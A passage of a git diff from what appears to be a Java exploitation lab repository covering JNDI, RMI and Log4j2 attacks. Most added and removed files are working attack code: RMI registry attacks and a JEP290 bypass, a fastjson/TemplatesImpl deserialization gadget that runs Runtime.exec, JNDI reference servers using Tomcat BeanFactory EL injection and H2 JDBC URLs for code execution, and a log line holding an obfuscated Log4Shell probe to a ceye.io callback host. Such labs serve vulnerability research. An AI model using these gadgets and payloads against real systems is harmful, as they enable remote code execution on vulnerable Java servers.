instanceof URLClassLoader)) { + this.writeObject((Object)null); + } else { + URL[] us = ((URLClassLoader)cl.getClassLoader()).getURLs(); + String cb = ""; + + for(URL u : us) { + cb = cb + u.toString(); + } + + this.writeObject(cb); + } + + } + + protected void annotateProxyClass(Class cl) throws IOException { + this.annotateClass(cl); + } + } + + +} \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/RMI/MyRegistry.java b/JNDI/JNDI/src/main/java/RMI/MyRegistry.java new file mode 100644 index 0000000..c70761c --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/MyRegistry.java @@ -0,0 +1,14 @@ +package RMI; + +import remoteObj.HelloImpl; + +import java.rmi.AlreadyBoundException; +import java.rmi.RemoteException; +import java.rmi.registry.LocateRegistry; + +public class MyRegistry { + public static void main(String[] args) throws RemoteException, AlreadyBoundException { + java.rmi.registry.Registry registry = LocateRegistry.createRegistry(1099); + registry.bind("hello", new HelloImpl()); + } +} diff --git a/JNDI/JNDI/src/main/java/RMI/Server.java b/JNDI/JNDI/src/main/java/RMI/Server.java new file mode 100644 index 0000000..d39d2de --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/Server.java @@ -0,0 +1,78 @@ +package RMI; + +import com.alibaba.fastjson.JSONArray; +import remoteObj.HelloImpl; +import sun.rmi.server.UnicastRef; +import sun.rmi.transport.LiveRef; +import sun.rmi.transport.tcp.TCPEndpoint; +import tools.ClassByteGen; +import tools.InvocationHandlerImpl; +import tools.ReflectTools; +import tools.TemplatesGen; + +import javax.management.BadAttributeValueExpException; +import javax.xml.transform.Templates; +import java.lang.reflect.Proxy; +import java.rmi.Remote; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; +import java.rmi.server.ObjID; +import java.rmi.server.RemoteObjectInvocationHandler; +import java.util.Random; + +public class Server { + + public static void main(String[] args) throws Exception { + serverAttackRegistryWithJRMP(); + } + + // 正常绑定远程对象 + public static void bind() throws Exception { + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099); + registry.bind("HelloImpl", new HelloImpl()); + } + + + // fastjson原生反序列化触发getter,bind实现server打registry,适用于<8u121 + public static void serverAttackRegistryWithBind() throws Exception { + String code = "{\n" + + " Runtime.getRuntime().exec(\"calc\");\n" + + " }"; + byte[] bytes = ClassByteGen.getBytes(code, "AAAA"); + Templates templates = TemplatesGen.getTemplates(bytes, null); + JSONArray jsonArray = new JSONArray(); + jsonArray.add(templates); + + BadAttributeValueExpException bad = new BadAttributeValueExpException("aaa"); + ReflectTools.setFieldValue(bad, "val", jsonArray); + + InvocationHandlerImpl invocationHandler = new InvocationHandlerImpl(bad); + Remote o = (Remote) Proxy.newProxyInstance(invocationHandler.getClass().getClassLoader(), new Class[]{Remote.class}, invocationHandler); + + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099); + registry.bind("evil1", o); + } + + // 将stub里的skel地址指向恶意JRMP服务,实现server打registry + public static void serverAttackRegistryWithJRMP() throws Exception { + ObjID id = new ObjID(new Random().nextInt()); // RMI registry + TCPEndpoint te = new TCPEndpoint("127.0.0.1", 13999); + UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); + RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref); + Registry proxy = (Registry) Proxy.newProxyInstance(Server.class.getClassLoader(), new Class[] { + Registry.class + }, obj); + + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099); + registry.bind("evil24", proxy); + } + + // 通过DGC JRMP实现registry打server + public static void registerAttackServer() throws Exception { + // java-chains启动恶意JRMP服务 + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 13999); + HelloImpl hello = new HelloImpl(); + registry.bind("evil3", hello); + } + +} diff --git a/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java b/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java new file mode 100644 index 0000000..e78572b --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java @@ -0,0 +1,73 @@ +package RMI; + +import sun.rmi.registry.RegistryImpl_Stub; +import sun.rmi.server.UnicastRef; +import sun.rmi.transport.LiveRef; +import sun.rmi.transport.tcp.TCPEndpoint; + +import java.io.ObjectOutput; +import java.io.ObjectOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.Proxy; +import java.rmi.Remote; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; +import java.rmi.server.*; +import java.util.Random; + +// 绕过JEP290(8u231~8u240) +public class ServerBypassJEP290 { + public static void main(String[] args) throws Exception { + UnicastRemoteObject payload = getPayload(); + java.rmi.registry.Registry registry = LocateRegistry.getRegistry(1099); + bindReflection("pwn", payload, registry); + } + + static UnicastRemoteObject getPayload() throws Exception { + ObjID id = new ObjID(new Random().nextInt()); + TCPEndpoint te = new TCPEndpoint("localhost", 13999); + UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); + + System.getProperties().put("sun.misc.ProxyGenerator.saveGeneratedFiles", "true"); + RemoteObjectInvocationHandler handler = new RemoteObjectInvocationHandler(ref); + RMIServerSocketFactory factory = (RMIServerSocketFactory) Proxy.newProxyInstance( + handler.getClass().getClassLoader(), + new Class[]{RMIServerSocketFactory.class, Remote.class}, + handler + ); + + Constructor constructor = UnicastRemoteObject.class.getDeclaredConstructor(); + constructor.setAccessible(true); + UnicastRemoteObject unicastRemoteObject = constructor.newInstance(); + + Field field_ssf = UnicastRemoteObject.class.getDeclaredField("ssf"); + field_ssf.setAccessible(true); + field_ssf.set(unicastRemoteObject, factory); + + return unicastRemoteObject; + } + + static void bindReflection(String name, Object obj, Registry registry) throws Exception { + Field ref_filed = RemoteObject.class.getDeclaredField("ref"); + ref_filed.setAccessible(true); + UnicastRef ref = (UnicastRef) ref_filed.get(registry); + + Field operations_filed = RegistryImpl_Stub.class.getDeclaredField("operations"); + operations_filed.setAccessible(true); + Operation[] operations = (Operation[]) operations_filed.get(registry); + + RemoteCall remoteCall = ref.newCall((RemoteObject) registry, operations, 0, 4905912898345647071L); + ObjectOutput outputStream = remoteCall.getOutputStream(); + + Field enableReplace_filed = ObjectOutputStream.class.getDeclaredField("enableReplace"); + enableReplace_filed.setAccessible(true); + enableReplace_filed.setBoolean(outputStream, false); + + outputStream.writeObject(name); + outputStream.writeObject(obj); + + ref.invoke(remoteCall); + ref.done(remoteCall); + } +} diff --git a/JNDI/JNDI/src/main/java/RMIServer.java b/JNDI/JNDI/src/main/java/RMIServer.java new file mode 100644 index 0000000..d65eb3f --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMIServer.java @@ -0,0 +1,18 @@ +import com.sun.jndi.rmi.registry.ReferenceWrapper; + +import java.rmi.AlreadyBoundException; +import java.rmi.RemoteException; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; +import javax.naming.NamingException; +import javax.naming.Reference; + +public class RMIServer { + public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { + Registry registry = LocateRegistry.createRegistry(1099); + // factory表示加载的类的url和类名,所以恶意类文件必须以全类名命名 + Reference reference = new Reference("Calc1233", "Calc", "http://127.0.0.1:7777/"); + ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); + registry.bind("Calc123", referenceWrapper); + } +} diff --git a/JNDI/JNDI/src/main/java/remoteObj/Hello.java b/JNDI/JNDI/src/main/java/remoteObj/Hello.java new file mode 100644 index 0000000..83be131 --- /dev/null +++ b/JNDI/JNDI/src/main/java/remoteObj/Hello.java @@ -0,0 +1,8 @@ +package remoteObj; + +import java.rmi.Remote; +import java.rmi.RemoteException; + +public interface Hello extends Remote { + public String hello(String name) throws RemoteException; +} diff --git a/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java b/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java new file mode 100644 index 0000000..291d8c1 --- /dev/null +++ b/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java @@ -0,0 +1,14 @@ +package remoteObj; + +import java.rmi.RemoteException; +import java.rmi.server.UnicastRemoteObject; + +public class HelloImpl extends UnicastRemoteObject implements Hello { + public HelloImpl() throws RemoteException { + } + + @Override + public String hello(String name) throws RemoteException { + return "hello " + name; + } +} diff --git a/JNDI/JNDI/src/main/java/tools/ClassByteGen.java b/JNDI/JNDI/src/main/java/tools/ClassByteGen.java new file mode 100644 index 0000000..9275013 --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/ClassByteGen.java @@ -0,0 +1,29 @@ +package tools; + +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtConstructor; + +public class ClassByteGen { + public static byte[] getBytes(String code, String className) throws Exception { +// String Abstract = "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"; + ClassPool pool = ClassPool.getDefault(); +// pool.importPackage(Abstract); + pool.importPackage("java.io"); + pool.importPackage("java.nio.file"); + pool.importPackage("java.lang.reflect"); + pool.importPackage("java.nio.charset"); + pool.importPackage("java.util"); +// pool.insertClassPath(Abstract); +// pool.insertClassPath("java.nio"); + CtClass ctClass = pool.makeClass(className); +// ctClass.setSuperclass(pool.get(Abstract)); + CtConstructor ctConstructor = ctClass.makeClassInitializer(); + ctConstructor.setBody(code); +// CtConstructor ctConstructor1 = new CtConstructor(new CtClass[]{}, ctClass); +// ctConstructor1.setBody(code); +// ctClass.addConstructor(ctConstructor1); + ctClass.writeFile("ClassByteGen"); + return ctClass.toBytecode(); + } +} diff --git a/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java b/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java new file mode 100644 index 0000000..7c15d95 --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java @@ -0,0 +1,19 @@ +package tools; + +import java.io.Serializable; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Method; + +// 动态代理,实现对象接口转化 +public class InvocationHandlerImpl implements InvocationHandler, Serializable { + private Object object; + + public InvocationHandlerImpl(Object obj) { + this.object = obj; + } + + @Override + public Object invoke(Object proxy, Method method, Object[] args) throws Throwable { + return null; + } +} diff --git a/JNDI/JNDI/src/main/java/tools/Payload.java b/JNDI/JNDI/src/main/java/tools/Payload.java new file mode 100644 index 0000000..5396724 --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/Payload.java @@ -0,0 +1,10 @@ +package tools; + +public abstract class Payload { +// public Templates getTemplates(byte[] byteCode, String bytePath) throws Exception { +// Templates templates = TemplatesGen.getTemplates(byteCode, bytePath); +// return templates; +// } + + public abstract String getPayload(byte[] byteCode, String bytePath) throws Exception; +} diff --git a/JNDI/JNDI/src/main/java/tools/PayloadGen.java b/JNDI/JNDI/src/main/java/tools/PayloadGen.java new file mode 100644 index 0000000..475286b --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/PayloadGen.java @@ -0,0 +1,23 @@ +package tools; + +import com.alibaba.fastjson.JSONArray; + +import javax.management.BadAttributeValueExpException; +import javax.xml.transform.Templates; + +public class PayloadGen { + public static Object getPayload() throws Exception { + String code = "{\n" + + " Runtime.getRuntime().exec(\"calc\");\n" + + " }"; + byte[] bytes = ClassByteGen.getBytes(code, "AAAA"); + Templates templates = TemplatesGen.getTemplates(bytes, null); + JSONArray jsonArray = new JSONArray(); + jsonArray.add(templates); + + BadAttributeValueExpException bad = new BadAttributeValueExpException("aaa"); + ReflectTools.setFieldValue(bad, "val", jsonArray); + + return bad; + } +} diff --git a/JNDI/JNDI/src/main/java/tools/ReflectTools.java b/JNDI/JNDI/src/main/java/tools/ReflectTools.java new file mode 100644 index 0000000..e064009 --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/ReflectTools.java @@ -0,0 +1,71 @@ +package tools; + +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtField; + +import java.io.*; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Modifier; +import java.lang.reflect.Proxy; +import java.util.Base64; + +public class ReflectTools { + public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { + Class aClass = obj.getClass(); + Field field = null; + try { + field = aClass.getDeclaredField(fieldName); + } catch (NoSuchFieldException e) { + aClass = aClass.getSuperclass(); + } + field.setAccessible(true); + field.set(obj, value); + } + + // 生成不继承Serializable接口的Class,防止因suid不一样报错 + public static Class makeClass(String className, String suid) throws ClassNotFoundException, CannotCompileException { + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = pool.makeClass(className); + + if (suid != null) { + // 添加 serialVersionUID 字段并指定其值 + CtField serialVersionUIDField = new CtField(CtClass.longType, "serialVersionUID", ctClass); + serialVersionUIDField.setModifiers(Modifier.PRIVATE | Modifier.STATIC | Modifier.FINAL); // 设置为private static final + ctClass.addField(serialVersionUIDField, suid); // 设置 serialVersionUID 值为 1L + } + + Class aClass = ctClass.toClass(); + return aClass; + } + + public static byte[] ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(obj); + return baos.toByteArray(); + } + + public static void ser2file(Object obj, String fileName) throws IOException { + FileOutputStream fos = new FileOutputStream(fileName); + ObjectOutputStream oos = new ObjectOutputStream(fos); + oos.writeObject(obj); + } + + public static Object deser(byte[] bytes, String base64) throws IOException, ClassNotFoundException { + if (bytes != null) { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + }else { + byte[] decode = Base64.getDecoder().decode(base64); + ByteArrayInputStream bais = new ByteArrayInputStream(decode); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + } + } + + +} diff --git a/JNDI/JNDI/src/main/java/tools/TemplatesGen.java b/JNDI/JNDI/src/main/java/tools/TemplatesGen.java new file mode 100644 index 0000000..5fbf00d --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/TemplatesGen.java @@ -0,0 +1,35 @@ +package tools; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; + +import javax.xml.transform.Templates; +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class TemplatesGen { + public static Templates getTemplates(byte[] byteCode, String bytePath) throws IOException, IllegalAccessException, CannotCompileException { + byte[] evilBytes; + if (byteCode != null) { + evilBytes = byteCode; + }else { + evilBytes = Files.readAllBytes(Paths.get(bytePath)); + } + TemplatesImpl templates = new TemplatesImpl(); + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = pool.makeClass("useless"); + byte[] useless = ctClass.toBytecode(); + ReflectTools.setFieldValue(templates, "_name", "1diot9"); + ReflectTools.setFieldValue(templates, "_class", null); +// ReflectTools.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + ReflectTools.setFieldValue(templates, "_transletIndex", 0); + // 修改bytecodes数量和transletIndex,这样就不用继承AbstractTranslet + ReflectTools.setFieldValue(templates, "_bytecodes", new byte[][]{evilBytes, useless}); + return templates; + } + +} diff --git a/JNDI/JNDI_vul/.idea/encodings.xml b/JNDI/JNDI_vul/.idea/encodings.xml deleted file mode 100644 index 8c3a518..0000000 --- a/JNDI/JNDI_vul/.idea/encodings.xml +++ /dev/null @@ -1,11 +0,0 @@ - - - - - - - - - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/client/pom.xml b/JNDI/JNDI_vul/client/pom.xml deleted file mode 100644 index 09045e5..0000000 --- a/JNDI/JNDI_vul/client/pom.xml +++ /dev/null @@ -1,20 +0,0 @@ - - - 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - - - client - - - 8 - 8 - UTF-8 - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/pom.xml b/JNDI/JNDI_vul/pom.xml deleted file mode 100644 index d79e385..0000000 --- a/JNDI/JNDI_vul/pom.xml +++ /dev/null @@ -1,93 +0,0 @@ - - - 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - pom - - server - client - - - - 8 - 8 - UTF-8 - - - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - test - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - compile - - - org.apache.tomcat - tomcat-catalina - 8.5.51 - - - org.apache.tomcat - tomcat-jasper - 8.5.51 - - - commons-collections - commons-collections - 3.2.1 - - - - org.apache.xbean - xbean-reflect - 4.18 - - - - - com.h2database - h2 - 2.2.220 - - - - - - commons-dbcp - commons-dbcp - 1.4 - - - - commons-pool - commons-pool - 1.5.4 - - - - - org.apache.commons - commons-dbcp2 - 2.9.0 - - - - - org.apache.tomcat - tomcat-jdbc - 8.5.51 - - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/server/pom.xml b/JNDI/JNDI_vul/server/pom.xml deleted file mode 100644 index 1634d2a..0000000 --- a/JNDI/JNDI_vul/server/pom.xml +++ /dev/null @@ -1,20 +0,0 @@ - - - 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - - - server - - - 8 - 8 - UTF-8 - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java b/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java deleted file mode 100644 index 49ee34e..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java +++ /dev/null @@ -1,15 +0,0 @@ -package factory.beanFactory; - -import javax.el.ELProcessor; - -public class EL_test { - public static void main(String[] args) { - ELProcessor elProcessor = new ELProcessor(); - // 将 Runtime 对象注入到 EL 上下文中 - elProcessor.defineBean("runtime", Runtime.getRuntime()); - - // 使用 EL 表达式调用 exec 方法 - String expression = "${runtime.exec('calc')}"; - elProcessor.eval(expression); - } -} diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java b/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java deleted file mode 100644 index 2ac7315..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java +++ /dev/null @@ -1,31 +0,0 @@ -package factory.beanFactory; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; -import org.apache.naming.ResourceRef; - -import javax.naming.StringRefAddr; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -// JNDI 高版本 jdk 绕过服务端,用 bind 的方式 -public class JNDIBypassHighJavaServerEL { - public static void main(String[] args) throws Exception { - System.out.println("[*]Evil RMI Server is Listening on port: 1099"); - Registry registry = LocateRegistry.createRegistry(1099); - - // 实例化Reference,指定目标类为javax.el.ELProcessor,工厂类为org.apache.naming.factory.BeanFactory - ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", - true,"org.apache.naming.factory.BeanFactory",null); - - // 强制将'x'属性的setter从'setX'变为'eval', 详细逻辑见BeanFactory.getObjectInstance代码 - ref.add(new StringRefAddr("forceString", "x=eval")); - - // 利用表达式执行命令 - ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\")" + - ".newInstance().getEngineByName(\"JavaScript\")" + - ".eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")")); - System.out.println("[*]Evil command: calc"); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref); - registry.bind("Object", referenceWrapper); -} -} \ No newline at end of file diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java b/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java deleted file mode 100644 index 65adc37..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java +++ /dev/null @@ -1,61 +0,0 @@ -package factory.trustSerialFalse; - -import com.unboundid.ldap.listener.InMemoryDirectoryServer; -import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; -import com.unboundid.ldap.listener.InMemoryListenerConfig; -import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; -import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; -import com.unboundid.ldap.sdk.Entry; -import com.unboundid.ldap.sdk.LDAPResult; -import com.unboundid.ldap.sdk.ResultCode; - -import javax.net.ServerSocketFactory; -import javax.net.SocketFactory; -import javax.net.ssl.SSLSocketFactory; -import java.net.InetAddress; - -public class ldapserver { - public static void main(String[] args) { - try { - InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig("dc=example,dc=com"); - config.setListenerConfigs(new InMemoryListenerConfig( - "listen", - InetAddress.getByName("0.0.0.0"), - 1389, - ServerSocketFactory.getDefault(), - SocketFactory.getDefault(), - (SSLSocketFactory) SSLSocketFactory.getDefault())); - - config.addInMemoryOperationInterceptor(new OperationInterceptor()); - InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); - System.out.println("[LDAP] Listening on 0.0.0.0:1389"); - ds.startListening(); - } catch (Exception e) { - e.printStackTrace(); - } - } - //tomcat-jdbc + h2 - //decodeReference 绕过decodeObject,打本地工厂 - public static class OperationInterceptor extends InMemoryOperationInterceptor { - - @Override - public void processSearchResult(InMemoryInterceptedSearchResult searchResult) { - String base = searchResult.getRequest().getBaseDN(); - Entry e = new Entry(base); - e.addAttribute("objectClass","javaNamingReference"); - - e.addAttribute("javaClassName", "javax.sql.DataSource"); - e.addAttribute("javaFactory","org.apache.tomcat.jdbc.pool.DataSourceFactory"); - String JDBC_URL = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd)\\;return \"1\"\\;}'\\;CALL EXEC ('calc')"; - e.addAttribute("javaReferenceAddress",new String[]{"/0/url/"+JDBC_URL,"/1/driverClassName/org.h2.Driver","/2/username/Squirt1e","/3/password/Squirt1e","/4/initialSize/1"}); - - - try { - searchResult.sendSearchEntry(e); - searchResult.setResult(new LDAPResult(0, ResultCode.SUCCESS)); - } catch (Exception ex) { - ex.printStackTrace(); - } - } - } -} diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java b/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java deleted file mode 100644 index bb0045b..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java +++ /dev/null @@ -1,48 +0,0 @@ -package factory.withJDBC.rmi; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; - -import javax.naming.NamingException; -import javax.naming.Reference; -import javax.naming.StringRefAddr; -import java.rmi.AlreadyBoundException; -import java.rmi.RemoteException; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -public class dbcp { - public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { - Registry registry = LocateRegistry.createRegistry(1099); - Reference reference = commons_dbcp2_RCE(); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); - registry.bind("Object", referenceWrapper); - - - } - - private static Reference tomcat_dbcp2_RCE(){ - return dbcpByFactory("org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory"); - } - private static Reference tomcat_dbcp1_RCE(){ - return dbcpByFactory("org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory"); - } - private static Reference commons_dbcp2_RCE(){ - return dbcpByFactory("org.apache.commons.dbcp2.BasicDataSourceFactory"); - } - private static Reference commons_dbcp1_RCE(){ - return dbcpByFactory("org.apache.commons.dbcp.BasicDataSourceFactory"); - } - private static Reference dbcpByFactory(String factory){ - Reference ref = new Reference("javax.sql.DataSource",factory,null); - String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" + - "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" + - "java.lang.Runtime.getRuntime().exec('calc')\n" + - "$$\n"; - ref.add(new StringRefAddr("driverClassName","org.h2.Driver")); - ref.add(new StringRefAddr("url",JDBC_URL)); - ref.add(new StringRefAddr("username","root")); - ref.add(new StringRefAddr("password","password")); - ref.add(new StringRefAddr("initialSize","1")); - return ref; - } -} diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java b/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java deleted file mode 100644 index dfd49ea..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java +++ /dev/null @@ -1,36 +0,0 @@ -package factory.withJDBC.rmi; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; - -import javax.naming.Reference; -import javax.naming.StringRefAddr; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -public class tomcat_dbcp { - public static void main(String[] args) throws Exception { - Registry registry = LocateRegistry.createRegistry(1099); - Reference reference = tomcat_JDBC_RCE(); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); - registry.bind("Object", referenceWrapper); - } - - - private static Reference tomcat_JDBC_RCE(){ - return dbcpByFactory("org.apache.tomcat.jdbc.pool.DataSourceFactory"); - } - private static Reference dbcpByFactory(String factory){ - Reference ref = new Reference("javax.sql.DataSource",factory,null); - String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" + - "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" + - "java.lang.Runtime.getRuntime().exec('calc')\n" + - "$$\n"; - ref.add(new StringRefAddr("driverClassName","org.h2.Driver")); - ref.add(new StringRefAddr("url",JDBC_URL)); - ref.add(new StringRefAddr("username","root")); - ref.add(new StringRefAddr("password","password")); - ref.add(new StringRefAddr("initialSize","1")); - return ref; - } - -} diff --git a/JNDI/JNDI_vul/.gitignore b/JNDI/Log4j2/.gitignore similarity index 100% rename from JNDI/JNDI_vul/.gitignore rename to JNDI/Log4j2/.gitignore diff --git a/JNDI/JNDI_vul/.idea/.gitignore b/JNDI/Log4j2/.idea/.gitignore similarity index 100% rename from JNDI/JNDI_vul/.idea/.gitignore rename to JNDI/Log4j2/.idea/.gitignore diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml b/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml new file mode 100644 index 0000000..4ea72a9 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml b/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml new file mode 100644 index 0000000..7ef04e2 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml b/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml new file mode 100644 index 0000000..1f2ea11 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml b/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml new file mode 100644 index 0000000..8648f94 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/encodings.xml b/JNDI/Log4j2/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/JNDI/Log4j2/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/JNDI/JNDI_vul/.idea/misc.xml b/JNDI/Log4j2/.idea/misc.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/misc.xml rename to JNDI/Log4j2/.idea/misc.xml diff --git a/JNDI/JNDI_vul/.idea/vcs.xml b/JNDI/Log4j2/.idea/vcs.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/vcs.xml rename to JNDI/Log4j2/.idea/vcs.xml diff --git a/JNDI/Log4j2/logs/app.log b/JNDI/Log4j2/logs/app.log new file mode 100644 index 0000000..5bab32d --- /dev/null +++ b/JNDI/Log4j2/logs/app.log @@ -0,0 +1,125 @@ +2025-12-08 14:03:20 INFO com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:03:20 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:03:20 ERROR com.example.spring.controller.IndexController - Hello, World +2025-12-08 14:03:26 INFO com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:03:26 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dUq1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/ user +2025-12-08 14:03:27 ERROR com.example.spring.controller.IndexController - Hello, World +2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:03:50 ERROR com.example.spring.controller.IndexController - Hello, 123 +2025-12-08 14:03:50 INFO 